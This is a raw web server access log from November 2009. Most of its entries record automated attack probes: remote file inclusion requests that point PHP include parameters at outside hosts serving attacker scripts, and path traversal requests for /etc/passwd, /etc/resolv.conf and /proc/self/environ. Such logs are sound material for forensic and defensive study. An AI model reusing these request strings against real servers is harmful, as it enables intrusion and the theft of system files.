118.107.162.36 - - [13/Nov/2009:22:13:56 -0600] "GET /logs/access_log.1249776000///phpsecurityadmin/include/logout.php?PSA_PATH=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:22:14:23 -0600] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_root=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:22:14:23 -0600] "GET /logs/access_log.1251504000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_root=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:22:14:23 -0600] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_root=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:22:14:50 -0600] "GET /logs/access_log.1251072000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_root=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.207.22 - - [13/Nov/2009:22:18:26 -0600] "GET /logs/ HTTP/1.1" 200 212720 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.127 - - [13/Nov/2009:22:19:38 -0600] "GET //skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:19:38 -0600] "GET /logs/access_log.1252281600//skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:19:38 -0600] "GET //skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:19:39 -0600] "GET /logs/access_log.1252281600//skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:19:39 -0600] "GET /logs//skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:19:39 -0600] "GET /logs//skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:19:43 -0600] "GET /logs//skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:19:43 -0600] "GET //skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:19:43 -0600] "GET /logs/access_log.1252281600//skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:20:12 -0600] "GET /logs/access_log.1254182400//skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:20:13 -0600] "GET /logs/access_log.1254182400//skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:20:17 -0600] "GET /logs/access_log.1254182400//skin/jiyoo_skysilver/view.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
82.56.56.229 - - [13/Nov/2009:22:21:38 -0600] "GET /?sourcedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""libwww-perl/5.813"
82.56.56.229 - - [13/Nov/2009:22:21:42 -0600] "GET /logs/?sourcedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 212720 "-""libwww-perl/5.813"
62.103.31.24 - - [13/Nov/2009:22:24:38 -0600] "GET /logs/access_log.1253491200/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 392 "-""Mozilla/5.0"
62.103.31.24 - - [13/Nov/2009:22:24:44 -0600] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
62.103.31.24 - - [13/Nov/2009:22:24:44 -0600] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.103.31.24 - - [13/Nov/2009:22:25:28 -0600] "GET /logs/access_log.1253577600/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 392 "-""Mozilla/5.0"
65.55.110.192 - - [13/Nov/2009:22:27:08 -0600] "GET /logs/access_log.1136246400 HTTP/1.1" 200 1570 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30707)"
78.110.50.127 - - [13/Nov/2009:22:28:01 -0600] "GET //?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:01 -0600] "GET /logs/access_log.1250294400//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:01 -0600] "GET /logs//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:01 -0600] "GET //?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:04 -0600] "GET /logs//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:04 -0600] "GET /logs/access_log.1250294400//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:26 -0600] "GET //?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:26 -0600] "GET /logs/access_log.1250294400//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:28 -0600] "GET /logs//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:54 -0600] "GET /logs/access_log.1253577600//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:28:55 -0600] "GET /logs/access_log.1253577600//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.109.61 - - [13/Nov/2009:22:28:57 -0600] "GET /logs/access_log.1170288000 HTTP/1.1" 200 36968 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
78.110.50.127 - - [13/Nov/2009:22:29:05 -0600] "GET /logs/access_log.1253577600//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.136.44.129 - - [13/Nov/2009:22:30:32 -0600] "GET /become_editor.php?theme_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""-"
94.136.44.129 - - [13/Nov/2009:22:30:32 -0600] "GET /logs/become_editor.php?theme_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""-"
94.136.44.129 - - [13/Nov/2009:22:30:32 -0600] "GET /become_editor.php?theme_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-""-"
94.136.44.129 - - [13/Nov/2009:22:30:32 -0600] "GET /logs/become_editor.php?theme_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 305 "-""-"
94.136.44.129 - - [13/Nov/2009:22:30:44 -0600] "GET /logs/become_editor.php?theme_path=http://www.barrytuinstra.com/media/i?????&mode=id HTTP/1.1" 404 305 "-""-"
94.136.44.129 - - [13/Nov/2009:22:30:44 -0600] "GET /become_editor.php?theme_path=http://www.barrytuinstra.com/media/i?????&mode=id HTTP/1.1" 404 300 "-""-"
78.110.50.127 - - [13/Nov/2009:22:34:21 -0600] "GET //?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:21 -0600] "GET /logs/access_log.1253059200//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:23 -0600] "GET /logs//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:33 -0600] "GET //?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:33 -0600] "GET /logs/access_log.1253059200//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:35 -0600] "GET /logs//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
207.58.164.77 - - [13/Nov/2009:22:34:40 -0600] "GET /logs/pagina.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 298 "-""-"
207.58.164.77 - - [13/Nov/2009:22:34:40 -0600] "GET /pagina.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 293 "-""-"
207.58.164.77 - - [13/Nov/2009:22:34:40 -0600] "GET /pagina.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 293 "-""-"
207.58.164.77 - - [13/Nov/2009:22:34:40 -0600] "GET /logs/pagina.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 298 "-""-"
207.58.164.77 - - [13/Nov/2009:22:34:40 -0600] "GET /logs/pagina.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 298 "-""-"
207.58.164.77 - - [13/Nov/2009:22:34:40 -0600] "GET /pagina.php?pagina=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 293 "-""-"
78.110.50.127 - - [13/Nov/2009:22:34:42 -0600] "GET //?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:42 -0600] "GET /logs/access_log.1253059200//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:43 -0600] "GET /logs/access_log.1251936000//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:44 -0600] "GET /logs//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:45 -0600] "GET /logs/access_log.1252713600//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:45 -0600] "GET //?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:47 -0600] "GET /logs//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:48 -0600] "GET /logs/access_log.1252713600//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:48 -0600] "GET //?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:49 -0600] "GET //?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:49 -0600] "GET /logs/access_log.1252713600//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:49 -0600] "GET /logs/access_log.1251936000//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:50 -0600] "GET /logs//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:50 -0600] "GET /logs/access_log.1251936000//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:34:51 -0600] "GET /logs//?_zb_path=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
65.55.110.123 - - [13/Nov/2009:22:35:24 -0600] "GET /logs/access_log.1114387200 HTTP/1.1" 200 334 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707)"
222.236.221.38 - - [13/Nov/2009:22:37:03 -0600] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:22:37:03 -0600] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:22:37:04 -0600] "GET /logs/access_log.1248480000//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
94.136.44.129 - - [13/Nov/2009:22:38:08 -0600] "GET /bad_link.php?theme_path=http://www.barrytuinstra.com/media/i?????&mode=id HTTP/1.1" 404 295 "-""-"
94.136.44.129 - - [13/Nov/2009:22:38:10 -0600] "GET /logs/bad_link.php?theme_path=http://www.barrytuinstra.com/media/i?????&mode=id HTTP/1.1" 404 300 "-""-"
94.136.44.129 - - [13/Nov/2009:22:39:18 -0600] "GET /logs/bad_link.php?theme_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""-"
94.136.44.129 - - [13/Nov/2009:22:39:18 -0600] "GET /bad_link.php?theme_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""-"
94.136.44.129 - - [13/Nov/2009:22:39:18 -0600] "GET /logs/bad_link.php?theme_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-""-"
94.136.44.129 - - [13/Nov/2009:22:39:19 -0600] "GET /bad_link.php?theme_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-""-"
222.236.221.38 - - [13/Nov/2009:22:39:20 -0600] "GET /logs/access_log.1233446400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:42:55 -0600] "GET /module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:42:55 -0600] "GET /logs/module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:42:55 -0600] "GET /module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:42:55 -0600] "GET /logs/access_log.1253491200/module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
65.55.106.229 - - [13/Nov/2009:22:42:55 -0600] "GET /logs/access_log.1162857600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.127 - - [13/Nov/2009:22:42:56 -0600] "GET /logs/access_log.1253491200/module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:42:57 -0600] "GET /logs/access_log.1253491200/module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:42:57 -0600] "GET /logs/module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:42:57 -0600] "GET /module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:42:59 -0600] "GET /logs/module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:22:43:17 -0600] "GET ///skin/dognara_gallery/login.php?dir=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:22:43:17 -0600] "GET /logs/access_log.1252886400///skin/dognara_gallery/login.php?dir=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:22:43:18 -0600] "GET /logs///skin/dognara_gallery/login.php?dir=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:43:19 -0600] "GET /logs/access_log.1253836800/module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:43:19 -0600] "GET /logs/access_log.1253836800/module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
78.110.50.127 - - [13/Nov/2009:22:43:19 -0600] "GET /logs/access_log.1253836800/module//modules/downloads/lib/lm_downloads.php?pathtoindex=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
210.222.86.19 - - [13/Nov/2009:22:43:27 -0600] "GET /logs/access_log.1254009600///skin/dognara_gallery/login.php?dir=http://www.timbaslot.com/stats/stats1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.110.69 - - [13/Nov/2009:22:44:12 -0600] "GET /logs/access_log.1243987200 HTTP/1.1" 200 572923 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30707; InfoPath.2)"
65.55.207.102 - - [13/Nov/2009:22:44:24 -0600] "GET /logs/access_log.1231632000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.111.74 - - [13/Nov/2009:22:44:57 -0600] "GET //rgboard/include/bbs.lib.inc.php?site_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:22:44:57 -0600] "GET //rgboard/include/bbs.lib.inc.php?site_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:22:44:57 -0600] "GET /logs/access_log.1233273600//rgboard/include/bbs.lib.inc.php?site_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:22:44:57 -0600] "GET /logs//rgboard/include/bbs.lib.inc.php?site_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:22:44:57 -0600] "GET /logs//rgboard/include/bbs.lib.inc.php?site_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:22:44:57 -0600] "GET /logs/access_log.1233273600//rgboard/include/bbs.lib.inc.php?site_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:22:44:57 -0600] "GET /logs/access_log.1234828800//rgboard/include/bbs.lib.inc.php?site_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.34.111.74 - - [13/Nov/2009:22:44:57 -0600] "GET /logs/access_log.1234828800//rgboard/include/bbs.lib.inc.php?site_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:45:32 -0600] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:45:32 -0600] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:45:32 -0600] "GET /logs/access_log.1253491200//skin/ggambo7002_board/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
65.55.110.82 - - [13/Nov/2009:22:45:34 -0600] "GET /logs/access_log.1169769600 HTTP/1.1" 200 11065 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707; InfoPath.2)"
222.231.1.132 - - [13/Nov/2009:22:46:11 -0600] "GET /logs/access_log.1253491200/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:46:11 -0600] "GET /logs/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:46:11 -0600] "GET /comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:46:29 -0600] "GET /logs/access_log.1247788800/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:46:32 -0600] "GET /logs/access_log.1247788800//skin/ggambo7002_board/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
65.55.106.161 - - [13/Nov/2009:22:46:40 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.161 - - [13/Nov/2009:22:47:25 -0600] "GET /logs/access_log.1215388800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.109.138 - - [13/Nov/2009:22:48:09 -0600] "GET /logs/access_log.1166400000 HTTP/1.1" 200 2192 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
94.136.44.129 - - [13/Nov/2009:22:51:21 -0600] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.barrytuinstra.com/media/i?????&mode=id HTTP/1.1" 404 335 "-""-"
207.244.223.5 - - [13/Nov/2009:22:51:21 -0600] "GET /logs//vwar/admin/admin.php?vwar_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.244.223.5 - - [13/Nov/2009:22:51:21 -0600] "GET //vwar/admin/admin.php?vwar_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
207.244.223.5 - - [13/Nov/2009:22:51:21 -0600] "GET /logs/access_log.1228608000%20%20//vwar/admin/admin.php?vwar_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
94.136.44.129 - - [13/Nov/2009:22:51:23 -0600] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.barrytuinstra.com/media/i?????&mode=id HTTP/1.1" 404 340 "-""-"
222.231.1.132 - - [13/Nov/2009:22:51:24 -0600] "GET /comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:51:24 -0600] "GET /logs/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:51:34 -0600] "GET /logs/access_log.1252540800/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.231.1.132 - - [13/Nov/2009:22:51:34 -0600] "GET /logs/access_log.1253491200/comment_modify.php?dir=http://kaaos.org/rotat/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.110.58 - - [13/Nov/2009:22:51:49 -0600] "GET /logs/access_log.1243900800 HTTP/1.1" 200 633056 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)"
203.253.204.218 - - [13/Nov/2009:22:51:59 -0600] "GET /logs///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.253.204.218 - - [13/Nov/2009:22:51:59 -0600] "GET ///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
203.253.204.218 - - [13/Nov/2009:22:52:03 -0600] "GET /logs/access_log.1250294400///skin/sirini_simplism_gallery_v4/setup.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
207.244.223.5 - - [13/Nov/2009:22:53:56 -0600] "GET /logs/access_log.1228608000//vwar/admin/admin.php?vwar_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.244.223.5 - - [13/Nov/2009:22:54:49 -0600] "GET //setup.php?dir=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
207.244.223.5 - - [13/Nov/2009:22:54:49 -0600] "GET /logs//setup.php?dir=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.244.223.5 - - [13/Nov/2009:22:54:50 -0600] "GET /logs/access_log.1252800000//setup.php?dir=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.136.44.129 - - [13/Nov/2009:22:54:50 -0600] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 340 "-""-"
94.136.44.129 - - [13/Nov/2009:22:54:50 -0600] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 335 "-""-"
